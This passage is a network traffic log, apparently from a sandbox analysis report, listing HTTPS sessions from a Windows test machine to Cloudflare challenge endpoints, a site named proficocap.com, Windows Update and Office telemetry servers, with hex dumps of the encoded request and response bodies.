                                                                          2024-12-08 19:51:06 UTC1343INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 6e 58 6a 5a 38 54 4a 4d 68 52 6c 72 6b 4e 71 4c 76 69 54 55 61 31 2f 78 44 55 51 62 66 65 54 61 66 6e 37 61 76 38 37 46 78 70 47 52 31 30 42 34 2b 4c 6e 34 70 32 2b 39 70 56 41 36 76 6e 72 6f 2f 44 4f 69 6b 4b 30 6b 42 74 76 42 69 61 55 4c 55 54 66 6c 78 49 58 73 72 32 6f 6c 4e 57 6e 54 6f 47 45 42 6a 79 4a 49 56 39 76 74 43 76 2f 4c 78 41 45 45 43 38 68 31 6c 41 34 50 41 5a 36 35 63 74 68 44 30 59 6e 6c 37 6e 79 4d 4e 44 33 74 44 30 46 47 43 56 48 32 45 4f 44 47 35 6c 2f 44 50 77 47 63 59 49 58 46 2b 35 5a 2b 35 65 56 74 34 48 32 31 34 58 6b 56 76 6a 31 6e 74 31 42 6a 65 55 54 78 51 48 78 30 6d 4d 53 5a 49 39 78 6c 64 57 69 4a 61 38 62 77 30 4c 39 39 6c 4c 35 37 4d 62 6d 61 7a 4e 65 4a 59 73 2f 56 36 64 5a 70 31
                                                                          Data Ascii: cf-chl-out-s: nXjZ8TJMhRlrkNqLviTUa1/xDUQbfeTafn7av87FxpGR10B4+Ln4p2+9pVA6vnro/DOikK0kBtvBiaULUTflxIXsr2olNWnToGEBjyJIV9vtCv/LxAEEC8h1lA4PAZ65cthD0Ynl7nyMND3tD0FGCVH2EODG5l/DPwGcYIXF+5Z+5eVt4H214XkVvj1nt1BjeUTxQHx0mMSZI9xldWiJa8bw0L99lL57MbmazNeJYs/V6dZp1
                                                                          2024-12-08 19:51:06 UTC1109INData Raw: 6a 6f 47 48 66 6f 71 54 53 33 31 63 68 70 61 51 68 70 69 4f 6c 5a 56 51 55 71 57 6f 5a 30 32 6c 6d 4a 36 56 6f 61 70 69 6c 4a 46 6e 6c 58 5a 68 6e 47 4e 34 58 72 61 70 72 36 61 79 75 33 4f 6c 6f 6e 6d 6d 68 33 4b 75 64 49 6e 47 75 62 2b 32 77 73 75 44 79 63 66 50 6e 70 46 37 6d 58 33 45 31 4d 37 45 31 73 7a 54 30 34 36 51 69 4f 52 30 69 34 79 4e 6a 75 62 5a 33 39 62 69 36 36 50 75 75 4f 6e 71 35 37 47 63 75 70 37 7a 38 76 62 6e 76 6f 36 6c 70 71 65 6f 41 66 50 35 38 50 77 47 76 66 54 36 43 75 41 4d 7a 62 62 55 75 41 34 4e 45 51 4c 59 71 4c 2f 41 77 63 49 62 44 68 51 4c 46 79 44 58 49 66 41 68 45 2b 4c 64 46 42 76 35 43 65 58 64 33 2f 4c 43 32 64 72 62 33 44 55 6f 4c 69 55 78 4f 76 45 37 43 7a 73 74 2f 50 63 62 50 53 38 39 45 77 6a 34 2b 67 37 64 33 76 58
                                                                          Data Ascii: joGHfoqTS31chpaQhpiOlZVQUqWoZ02lmJ6VoapilJFnlXZhnGN4Xrapr6ayu3Olonmmh3KudInGub+2wsuDycfPnpF7mX3E1M7E1szT046QiOR0i4yNjubZ39bi66PuuOnq57Gcup7z8vbnvo6lpqeoAfP58PwGvfT6CuAMzbbUuA4NEQLYqL/AwcIbDhQLFyDXIfAhE+LdFBv5CeXd3/LC2drb3DUoLiUxOvE7Czst/PcbPS89Ewj4+g7d3vX
                                                                          2024-12-08 19:51:06 UTC1369INData Raw: 71 47 49 73 63 36 72 6d 4d 54 4f 74 71 54 62 31 4d 66 4c 31 62 61 35 32 64 75 33 30 37 7a 52 35 36 4c 55 31 38 32 37 72 64 72 66 7a 2b 66 32 37 65 48 6c 39 39 4c 6c 75 75 6e 6d 2f 4c 33 30 7a 4e 6a 36 33 2f 44 41 42 63 6a 34 39 66 77 41 44 64 66 4e 2f 66 67 47 35 74 34 54 36 51 38 45 36 42 6b 62 35 66 48 76 2b 67 6a 79 45 78 54 66 48 43 6b 54 39 67 77 42 46 51 34 49 48 67 49 67 4c 69 4d 6c 37 78 63 74 41 67 6b 31 48 44 73 4b 4e 7a 51 30 4f 50 73 41 2b 42 6f 79 50 6b 50 39 50 54 49 34 4a 55 59 59 54 67 59 4b 50 6b 51 6b 55 69 39 57 54 54 52 48 4c 78 59 57 50 54 34 37 56 6b 52 66 4d 56 42 5a 49 55 68 65 54 57 77 36 58 45 35 77 4d 6d 42 30 5a 53 70 53 62 32 74 52 52 48 5a 50 50 6b 6b 39 66 58 74 33 51 59 5a 33 64 45 4e 56 58 46 39 47 69 6d 46 2b 57 47 71 41
                                                                          Data Ascii: qGIsc6rmMTOtqTb1MfL1ba52du307zR56LU1827rdrfz+f27eHl99Lluunm/L30zNj63/DABcj49fwADdfN/fgG5t4T6Q8E6Bkb5fHv+gjyExTfHCkT9gwBFQ4IHgIgLiMl7xctAgk1HDsKNzQ0OPsA+BoyPkP9PTI4JUYYTgYKPkQkUi9WTTRHLxYWPT47VkRfMVBZIUheTWw6XE5wMmB0ZSpSb2tRRHZPPkk9fXt3QYZ3dENVXF9GimF+WGqA
                                                                          2024-12-08 19:51:06 UTC1369INData Raw: 4f 72 76 4d 66 54 76 71 33 61 73 4c 33 58 6e 4a 33 58 76 74 75 6c 70 75 48 4e 36 4e 2b 70 75 75 2f 67 36 61 7a 6d 77 71 37 31 30 75 6e 5a 38 73 66 32 41 4c 6a 31 30 63 4c 30 77 77 6a 69 31 41 76 62 2f 4f 30 4b 78 74 7a 59 42 67 62 30 44 75 33 74 35 50 44 32 47 50 7a 30 31 4f 6b 50 38 65 30 59 44 74 67 6c 45 76 62 6b 42 75 45 48 42 41 41 66 42 42 63 64 4b 78 51 76 43 2b 38 4d 4d 42 4d 34 2b 66 73 31 50 78 63 65 41 42 30 79 52 45 55 2f 49 6b 4a 44 41 30 63 38 54 43 63 68 44 53 41 51 51 79 41 52 54 6a 4a 50 4a 56 73 6d 47 30 59 66 53 31 31 55 50 6a 63 35 4f 54 6b 37 56 6b 4a 45 56 31 5a 43 61 6c 68 71 51 58 4a 49 62 6c 39 70 5a 55 35 46 52 46 56 50 63 7a 64 64 57 54 70 56 65 30 56 77 63 46 6c 39 69 6e 74 66 67 55 32 4e 69 47 4a 63 67 33 46 53 55 57 4e 79 68
                                                                          Data Ascii: OrvMfTvq3asL3XnJ3XvtulpuHN6N+puu/g6azmwq710unZ8sf2ALj10cL0wwji1Avb/O0KxtzYBgb0Du3t5PD2GPz01OkP8e0YDtglEvbkBuEHBAAfBBcdKxQvC+8MMBM4+fs1PxceAB0yREU/IkJDA0c8TCchDSAQQyARTjJPJVsmG0YfS11UPjc5OTk7VkJEV1ZCalhqQXJIbl9pZU5FRFVPczddWTpVe0VwcFl9intfgU2NiGJcg3FSUWNyh
                                                                          2024-12-08 19:51:06 UTC293INData Raw: 65 6c 74 2b 76 33 39 47 68 6e 4c 7a 66 34 39 7a 44 71 5a 32 66 73 6f 4b 5a 6d 70 75 63 6e 5a 36 66 6f 4b 47 69 6f 36 53 6c 70 71 65 6f 41 66 50 35 38 50 77 47 76 51 66 57 42 2f 6a 49 77 2b 7a 72 37 66 72 4c 77 38 58 59 71 4c 2f 41 77 63 4c 44 78 4d 58 47 78 38 6a 4a 79 69 6e 59 7a 64 2f 66 34 4f 48 62 37 72 37 56 31 74 66 59 32 64 72 62 33 44 76 49 33 2b 44 68 34 6b 45 41 7a 39 44 52 36 4f 6e 71 36 30 51 33 50 54 52 41 53 51 46 48 4f 6b 6f 72 51 55 59 2f 53 6c 46 52 42 6b 52 59 55 55 74 56 53 54 6c 56 55 6b 31 58 46 6d 4a 56 57 31 4a 65 5a 78 39 52 56 6c 70 55 57 56 39 6b 57 47 6c 72 63 43 74 68 5a 32 78 43 63 6d 78 4a 66 58 5a 77 65 6f 4a 54 65 59 42 79 67 49 56 78 66 54 74 4f 48 70 4a 52 49 53 4b 43 67 44 74 45 6c 49 65 4e 68 4a 43 5a 55 5a 78 6d 6c 35
                                                                          Data Ascii: elt+v39GhnLzf49zDqZ2fsoKZmpucnZ6foKGio6SlpqeoAfP58PwGvQfWB/jIw+zr7frLw8XYqL/AwcLDxMXGx8jJyinYzd/f4OHb7r7V1tfY2drb3DvI3+Dh4kEAz9DR6Onq60Q3PTRASQFHOkorQUY/SlFRBkRYUUtVSTlVUk1XFmJVW1JeZx9RVlpUWV9kWGlrcCthZ2xCcmxJfXZweoJTeYBygIVxfTtOHpJRISKCgDtElIeNhJCZUZxml5


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.449788104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:08 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:08 UTC379INHTTP/1.1 404 Not Found
                                                                          Date: Sun, 08 Dec 2024 19:51:08 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cf-chl-out: gPJlJ0CYnuXpFfabzKHgv667brwDKnLSxsA=$2q+F2svspD+lJeCa
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef49d5bb13729f-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:51:08 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.4497874.245.163.56443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:08 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1pHf3xNPNeTPsur&MD=9ymk1AwG HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2024-12-08 19:51:09 UTC560INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                          MS-CorrelationId: b08c7f64-5926-463e-84e0-8b2d7946c2b0
                                                                          MS-RequestId: 03ce21ad-8628-437f-97f0-3f268bb6bb7f
                                                                          MS-CV: Ba4TxYcmW0+iZvo7.0
                                                                          X-Microsoft-SLSClientCache: 1440
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Sun, 08 Dec 2024 19:51:08 GMT
                                                                          Connection: close
                                                                          Content-Length: 30005
                                                                          2024-12-08 19:51:09 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                          2024-12-08 19:51:09 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.449789104.21.53.1714431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:09 UTC1302OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2103902929:1733530456:gWlw6UrWrF1EVwazpOoHDdN2NPkECb29gam9UES4p7M/8eef48dc28b04405/Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 6312
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-arch: "x86"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                          CF-Chl-RetryAttempt: 0
                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                          sec-ch-ua-bitness: "64"
                                                                          sec-ch-ua-model: ""
                                                                          CF-Challenge: Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://proficocap.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://proficocap.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:09 UTC6312OUTData Raw: 76 5f 38 65 65 66 34 38 64 63 32 38 62 30 34 34 30 35 3d 32 56 5a 34 6f 44 41 61 59 44 59 54 56 35 61 57 4b 45 35 6c 34 54 67 75 57 39 69 49 72 35 36 71 34 73 51 30 49 36 35 77 34 58 56 5a 41 65 35 5a 45 35 49 67 34 35 2d 51 35 48 34 41 5a 35 25 32 62 4b 5a 35 24 30 44 31 61 51 45 35 49 39 35 67 67 49 45 35 2d 30 41 58 4a 6b 49 68 71 6a 35 71 34 35 2b 35 50 49 34 44 63 58 35 33 24 76 51 35 49 4c 63 73 46 62 35 44 46 56 30 73 47 34 73 77 35 4f 34 35 56 54 35 4b 24 50 4d 35 4c 45 48 61 35 79 35 45 59 35 68 31 44 35 75 76 57 35 6c 45 59 58 35 49 32 79 53 76 74 24 35 35 4b 57 47 67 35 42 44 6f 73 37 32 4c 54 65 35 75 57 59 47 24 41 4f 34 49 57 64 73 6f 4b 35 36 78 79 7a 36 55 47 55 34 69 6b 45 55 30 35 39 4a 74 7a 35 58 34 79 57 34 49 61 78 35 49 77 35 72 38
                                                                          Data Ascii: v_8eef48dc28b04405=2VZ4oDAaYDYTV5aWKE5l4TguW9iIr56q4sQ0I65w4XVZAe5ZE5Ig45-Q5H4AZ5%2bKZ5$0D1aQE5I95ggIE5-0AXJkIhqj5q45+5PI4DcX53$vQ5ILcsFb5DFV0sG4sw5O45VT5K$PM5LEHa5y5EY5h1D5uvW5lEYX5I2ySvt$55KWGg5BDos72LTe5uWYG$AO4IWdsoK56xyz6UGU4ikEU059Jtz5X4yW4Iax5Iw5r8
                                                                          2024-12-08 19:51:09 UTC1151INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 4016
                                                                          Connection: close
                                                                          set-cookie: cf_chl_rc_m=;Expires=Sat, 07 Dec 2024 19:51:09 GMT;SameSite=Strict
                                                                          cf-chl-out: DfWh8smIf0hXlT3haVYLwdL2xuFG061JvYBihnH3XnNflVhI8USFoHjyhWKhaWNM3TxzNt0HCtvrobMQqKCyhOycxMQ1$SUh9wiCXKQNvXX1O
                                                                          cf-chl-out-s: 23swC9GZzuuTAASTNKutvJkk/wEgX0OUn6ONUEi5XdQP5jS1jeglWOreydQMDrHIjj77VfpL5JBHmC76kDB0ywmrm4Uhmf63MBtNEQASNjbJY4zwIeohzDqoIUyhVHB19WzaHuYW3ERkivdNu9gB9XY0EULnQ2uGN7cs2MHTZg0KFqTfWO+YhMIi3LRwaxyKeJFLnEfV9NxtgK59b1MibXn9kZFffIi6OXwkEaCUxZiVlFgo5aqpCxbajbouFF3dExUdKRNK2Ypmjz9E9tOGgaYs9sjf18AAYxxQZVMYmV5HhyWdrHwCMGPmXnh2jBFrzIycO+O+jwveLftS4Yri9EoHmrPIXlLQMrATzeTRtJSmERDl6zPw4Lhg2LhiRj2atk0Ty4M4RPb/COdtWe2cW0d0mK/ikbuXO/IsOi00B+1ZQ6w35AprJugERXQyvuxsjiAFMKkaZG34X9yYdH1+S/nRAGaysSfhkCfUqAAUuREVjuqaRsuDeo1ncTQE2gnp4EgbgJnLoK7ftJS+Qjirs+jq2RtPT0akATOjBFvJAcpBY+gA6YDKOatESmm5SRSG1eruUSUGroq0qWA5wyUEIA06809E+FSL1sxraQsfrsG4aUzHN3EGI+YuwUScuBYmaaRc6meske1oleKWMHx5YMW8mkPTDUOyZKx6IRojDQBdDmfEYjJHeq3fmzBhjFtTDtDv5UGKiF66vUgZ2vkqwTXEDKLbENcetVHDcnoIFBPK+N6w6a26v5aFcXsOzKbC68q6mPIEQd8=$gSGbNHHHu9Kmx8SS
                                                                          2024-12-08 19:51:09 UTC624INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 57 52 50 42 4a 6f 4c 58 42 66 4b 7a 46 62 67 59 51 51 61 36 6c 72 33 43 59 34 6e 48 37 6c 68 56 31 70 6e 63 7a 4c 37 6a 70 61 6a 76 6b 49 45 52 59 6a 4c 4d 63 56 37 73 4a 36 46 37 4f 65 50 4a 51 44 59 58 30 25 32 42 74 4d 38 77 50 30 58 59 6d 38 5a 48 55 59 63 4c 35 4c 61 32 30 69 6f 56 70 79 38 7a 63 55 53 57 5a 4c 56 57 43 4e 70 52 62 36 33 39 4f 66 44 41 25 32 42 63 25 32 46 4a 34 6b 59 71 55 30 74 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRPBJoLXBfKzFbgYQQa6lr3CY4nH7lhV1pnczL7jpajvkIERYjLMcV7sJ6F7OePJQDYX0%2BtM8wP0XYm8ZHUYcL5La20ioVpy8zcUSWZLVWCNpRb639OfDA%2Bc%2FJ4kYqU0tg%3D%3D"}],"group":"cf-nel","max_age":6048
                                                                          2024-12-08 19:51:09 UTC963INData Raw: 76 72 47 33 72 72 72 44 65 36 32 4d 74 73 62 41 74 73 69 2b 78 63 57 41 67 74 58 59 6c 33 33 56 79 4d 37 46 30 64 71 53 78 4d 47 58 78 61 61 52 7a 4a 4f 6f 6a 75 62 5a 33 39 62 69 36 36 50 56 30 71 6e 57 74 36 4c 65 70 4c 6e 6c 39 65 2f 6c 39 2b 33 30 39 4b 66 76 37 76 37 64 38 51 49 42 43 64 4d 42 41 76 37 39 2b 75 54 34 42 76 37 43 78 4c 77 5a 71 4c 2f 41 77 63 49 58 48 41 38 62 43 78 48 4a 30 69 4d 57 48 42 4d 66 4b 41 33 5a 45 78 67 63 46 68 73 68 4a 68 6f 72 4c 54 4c 6c 48 52 7a 6f 4a 68 67 2b 4e 69 7a 75 4a 76 4c 71 52 39 62 74 37 75 2f 77 38 66 4c 7a 39 44 6b 34 53 7a 37 35 41 6b 56 4c 55 6b 52 53 51 6b 56 58 54 56 74 4c 44 69 4c 79 43 67 73 4d 44 51 34 50 45 42 45 53 45 78 51 56 61 46 78 73 62 6d 78 70 48 43 52 68 5a 56 39 6b 61 6d 39 6a 64 32 6c
                                                                          Data Ascii: vrG3rrrDe62MtsbAtsi+xcWAgtXYl33VyM7F0dqSxMGXxaaRzJOojubZ39bi66PV0qnWt6LepLnl9e/l9+309Kfv7v7d8QIBCdMBAv79+uT4Bv7CxLwZqL/AwcIXHA8bCxHJ0iMWHBMfKA3ZExgcFhshJhorLTLlHRzoJhg+NizuJvLqR9bt7u/w8fLz9Dk4Sz75AkVLUkRSQkVXTVtLDiLyCgsMDQ4PEBESExQVaFxsbmxpHCRhZV9kam9jd2l
                                                                          2024-12-08 19:51:09 UTC1369INData Raw: 38 67 49 32 4f 69 34 71 48 64 70 69 58 52 6c 4a 6c 53 56 46 6d 54 49 43 54 6b 71 57 6a 6c 32 35 55 69 4a 65 6b 6e 59 79 6a 72 36 46 36 6a 4b 36 75 70 6e 31 6a 6c 4b 61 34 75 37 47 39 73 37 71 36 73 72 4a 32 69 31 74 79 63 33 52 31 30 32 46 34 65 58 70 37 77 4d 7a 42 31 4d 33 47 30 4e 65 53 79 4e 58 57 30 39 4c 50 69 36 6d 4e 30 64 37 66 33 4e 76 59 78 2b 6e 6f 73 6f 4c 32 68 50 4c 6c 36 2b 4c 75 39 36 2f 31 38 2f 76 4b 76 61 66 46 71 66 41 42 2b 76 41 44 2b 41 41 41 75 72 79 30 45 61 43 33 75 4c 6d 36 45 76 30 51 76 67 59 51 46 42 44 6f 45 63 58 6a 78 77 30 5a 44 69 45 61 45 78 30 6b 33 68 55 6c 47 52 59 71 48 50 77 6c 48 79 67 68 4b 7a 4c 6d 35 69 63 78 4e 54 48 72 37 67 4c 52 36 4f 6e 71 36 7a 4d 39 51 54 30 57 50 67 46 48 4f 6b 6f 59 54 45 31 4d 52 44
                                                                          Data Ascii: 8gI2Oi4qHdpiXRlJlSVFmTICTkqWjl25UiJeknYyjr6F6jK6upn1jlKa4u7G9s7q6srJ2i1tyc3R102F4eXp7wMzB1M3G0NeSyNXW09LPi6mN0d7f3NvYx+nosoL2hPLl6+Lu96/18/vKvafFqfAB+vAD+AAAury0EaC3uLm6Ev0QvgYQFBDoEcXjxw0ZDiEaEx0k3hUlGRYqHPwlHyghKzLm5icxNTHr7gLR6Onq6zM9QT0WPgFHOkoYTE1MRD
                                                                          2024-12-08 19:51:09 UTC1369INData Raw: 6b 35 53 4b 6c 49 74 72 6b 5a 4f 58 6b 46 57 62 6c 4b 53 53 6c 70 53 6f 6c 6f 69 63 71 4b 57 62 74 49 43 65 73 71 43 46 72 57 74 2b 54 6d 56 6d 5a 32 6a 47 56 46 56 73 62 57 35 76 78 72 4c 45 63 38 66 45 77 73 32 39 6e 62 76 50 76 62 48 4e 79 73 58 50 70 38 2b 45 6f 6f 62 4c 31 38 7a 66 32 4e 48 62 34 70 33 54 34 39 66 55 36 4e 71 37 34 39 33 6d 33 2b 6e 77 70 61 58 6f 37 76 48 33 39 36 75 75 77 5a 47 6f 71 61 71 72 41 50 7a 36 42 76 58 56 38 77 6a 31 36 51 59 44 2f 51 6a 66 43 4d 6f 52 42 42 54 68 46 68 63 57 44 67 67 63 48 41 37 52 30 53 41 6d 48 68 54 57 33 4e 48 5a 48 42 34 61 47 78 30 6e 34 4f 50 32 78 74 33 65 33 2b 41 31 4d 6a 41 37 4b 77 73 70 50 53 73 66 4f 7a 67 7a 50 52 55 39 41 45 59 35 53 52 64 4c 54 45 74 44 50 56 46 52 51 77 63 48 54 30 4e
                                                                          Data Ascii: k5SKlItrkZOXkFWblKSSlpSoloicqKWbtICesqCFrWt+TmVmZ2jGVFVsbW5vxrLEc8fEws29nbvPvbHNysXPp8+EoobL18zf2NHb4p3T49fU6Nq7493m3+nwpaXo7vH396uuwZGoqaqrAPz6BvXV8wj16QYD/QjfCMoRBBThFhcWDggcHA7R0SAmHhTW3NHZHB4aGx0n4OP2xt3e3+A1MjA7KwspPSsfOzgzPRU9AEY5SRdLTEtDPVFRQwcHT0N
                                                                          2024-12-08 19:51:09 UTC315INData Raw: 55 70 4c 4e 6b 31 4f 54 31 42 52 55 6c 4e 55 73 6b 42 58 57 46 6c 61 75 46 79 69 71 72 4b 6c 59 62 31 4e 5a 47 56 6d 5a 32 68 70 61 6d 74 57 62 57 35 76 63 4d 35 63 58 58 52 31 64 6e 65 2b 79 4d 7a 49 6f 63 6d 4d 77 4d 50 56 79 39 4c 53 68 5a 47 6b 69 4f 44 54 32 64 44 63 35 5a 33 50 31 4e 6a 53 31 39 33 69 31 75 66 70 37 71 6e 66 7a 4f 58 55 79 4f 4c 31 36 37 2b 50 70 71 65 6f 71 51 4c 30 2b 76 48 39 42 37 37 77 39 66 6e 7a 2b 50 34 45 39 77 6b 4c 45 4d 72 33 37 41 6f 59 31 64 41 46 46 52 59 4d 46 67 33 73 45 78 55 5a 45 74 59 57 49 43 51 67 2b 43 48 65 38 63 48 59 32 64 72 62 49 79 30 78 4c 51 59 75 38 44 63 36 4b 44 51 78 50 66 48 7a 42 39 62 74 37 75 2f 77 53 54 78 43 4f 55 56 4f 42 6c 45 62 54 45 31 4b 46 50 34 64 41 56 5a 56 57 55 6f 68 38 47 55 6b
                                                                          Data Ascii: UpLNk1OT1BRUlNUskBXWFlauFyiqrKlYb1NZGVmZ2hpamtWbW5vcM5cXXR1dne+yMzIocmMwMPVy9LShZGkiODT2dDc5Z3P1NjS193i1ufp7qnfzOXUyOL167+PpqeoqQL0+vH9B77w9fnz+P4E9wkLEMr37AoY1dAFFRYMFg3sExUZEtYWICQg+CHe8cHY2drbIy0xLQYu8Dc6KDQxPfHzB9bt7u/wSTxCOUVOBlEbTE1KFP4dAVZVWUoh8GUk


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          36192.168.2.44979313.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:11 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:12 UTC471INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:12 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 218853
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Cache-Control: public
